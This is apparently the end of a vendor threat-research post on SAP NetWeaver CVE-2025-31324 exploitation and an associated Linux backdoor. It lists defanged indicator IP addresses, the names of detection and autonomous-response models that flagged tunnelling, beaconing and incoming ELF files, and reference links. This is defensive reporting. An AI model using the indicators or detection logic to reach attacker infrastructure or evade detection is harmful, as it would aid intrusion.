  • 149[.]78[.]184[.]215
  • 196[.]251[.]85[.]31
  • 120[.]231[.]21[.]8
  • 148[.]135[.]80[.]109
  • 45[.]32[.]126[.]94
  • 110[.]42[.]42[.]64
  • 119[.]187[.]23[.]132
  • 18[.]166[.]61[.]47
  • 183[.]2[.]62[.]199
  • 188[.]166[.]87[.]88
  • 31[.]222[.]254[.]27
  • 91[.]193[.]19[.]109
  • 123[.]146[.]1[.]140
  • 139[.]59[.]143[.]102
  • 155[.]94[.]199[.]59
  • 165[.]227[.]173[.]41
  • 193[.]149[.]129[.]31
  • 202[.]189[.]7[.]77
  • 209[.]38[.]208[.]202
  • 31[.]222[.]254[.]45
  • 58[.]19[.]11[.]97
  • 64[.]227[.]32[.]66

Darktrace Model Detections

Compromise / Possible Tunnelling to Bin Services

Anomalous Server Activity / New User Agent from Internet Facing System

Anomalous File / Incoming ELF File

Anomalous Connection / Application Protocol on Uncommon Port

Anomalous Connection / New User Agent to IP Without Hostname

Experimental / Mismatched MIME Type From Rare Endpoint V4

Compromise / High Volume of Connections with Beacon Score

Device / Initial Attack Chain Activity

Device / Internet Facing Device with High Priority Alert

Compromise / Large Number of Suspicious Failed Connections

Model Alerts for CVE

Compromise / Possible Tunnelling to Bin Services

Compromise / High Priority Tunnelling to Bin Services

Autonomous Response Model Alerts

Antigena / Network::External Threat::Antigena Suspicious File Block

Antigena / Network::External Threat::Antigena File then New Outbound Block

Antigena / Network::Significant Anomaly::Antigena Controlled and Model Alert

Experimental / Antigena File then New Outbound Block

Antigena / Network::External Threat::Antigena Suspicious Activity Block

Antigena / Network::Significant Anomaly::Antigena Alerts Over Time Block

Antigena / Network::Significant Anomaly::Antigena Enhanced Monitoring from Client Block

Antigena / Network::Significant Anomaly::Antigena Enhanced Monitoring from Client Block

Antigena / Network::Significant Anomaly::Antigena Alerts Over Time Block

Antigena / MDR::Model Alert on MDR-Actioned Device

Antigena / Network::Significant Anomaly::Antigena Enhanced Monitoring from Client Block

References

1. https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/

2. https://unit42.paloaltonetworks.com/new-linux-backdoor-auto-color/

3. https://www.darktrace.com/blog/tracking-cve-2025-31324-darktraces-detection-of-sap-netweaver-exploitation-before-and-after-disclosure

4. https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/

5. https://www.forescout.com/blog/threat-analysis-sap-vulnerability-exploited-in-the-wild-by-chinese-threat-actor/
